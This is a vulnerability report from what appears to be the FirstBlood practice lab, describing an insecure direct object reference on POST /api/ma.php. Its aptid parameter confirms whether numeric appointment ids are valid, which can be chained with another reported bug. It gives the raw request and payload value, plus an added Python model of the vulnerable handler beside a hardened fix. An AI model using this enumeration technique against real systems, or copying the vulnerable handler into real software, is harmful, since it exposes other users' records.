FirstBlood-#129 IDOR 2 on ma.php - confirms numerical id for bug chain to report 127 without the need for drpanel
This issue was discovered on FirstBlood v1

On 2021-05-10, jpdev Level 3 reported:


Using the aptid parameter found on manageappointment.php, you can use this in place of the id parameter. This will ONLY confirm that the numerical id is valid and returns a success message; it does not cancel the appointment. If you do not have access to the drpanel you can use this bug in a bug chain to amend the messages on the appointment, see report 127.

Example of its use in a chain:

Use the request below to confirm the id is valid; with that id, perform the attack referenced in report id = 127.


POST /api/ma.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 25
DNT: 1
Connection: close
Cookie: drps=62f02a3467fff377e02116e10


P2 High

Endpoint: POST /api/ma.php

Parameter: aptid=

Payload: 56911904

FirstBlood ID: 6
Vulnerability Type: Insecure direct object reference

The endpoint ma.php (to modify an appointment) will allow for integer values to be used when modifying appointments. A bad case of security through obscurity was attempted.
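The following is an added example, not FirstBlood's code, modelling the flaw described above beside a hardened handler: the vulnerable version looks up a bare integer from aptid and its reply discloses whether that row exists, while the fixed version resolves only the unguessable id, requires the caller to own the appointment, and answers unknown and foreign records identically. The appointment records, the session table, the owner field and the response strings are constructed assumptions; only the parameter names (id, aptid) and the sample value 56911904 come from the report.

```python
"""Model of the IDOR in POST /api/ma.php and a hardened handler.

Added example, not FirstBlood's code. Appointment records, the session
table and the response strings are constructed assumptions; only the
parameter names (id, aptid) and the value 56911904 come from the report.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Appointment:
    num_id: int   # sequential database id, trivially enumerable
    token: str    # unguessable identifier handed to the owner
    owner: str    # account permitted to manage this appointment (assumed)


# Constructed sample data
APPOINTMENTS = (
    Appointment(56911904, "c0ffee-1111", "alice"),
    Appointment(56911905, "c0ffee-2222", "bob"),
)
SESSIONS = {"drps=SESSION_A": "alice"}  # constructed cookie -> account map


def vulnerable_ma(params: dict, cookie: Optional[str]) -> str:
    """Mirrors the report: an integer in aptid is looked up directly and the
    reply reveals whether such a row exists, with no authorization check."""
    if "aptid" in params:
        hit = any(str(a.num_id) == params["aptid"] for a in APPOINTMENTS)
        return "success" if hit else "invalid appointment"
    return "missing id"


def hardened_ma(params: dict, cookie: Optional[str]) -> str:
    """Fix: ignore the legacy integer parameter, resolve the record by its
    unguessable token only, and require the caller to own it. Unknown and
    foreign appointments receive the identical reply, removing the oracle."""
    user = SESSIONS.get(cookie or "")
    token = params.get("id", "")
    for a in APPOINTMENTS:
        if a.token == token and a.owner == user:
            return "success"
    return "invalid appointment"
```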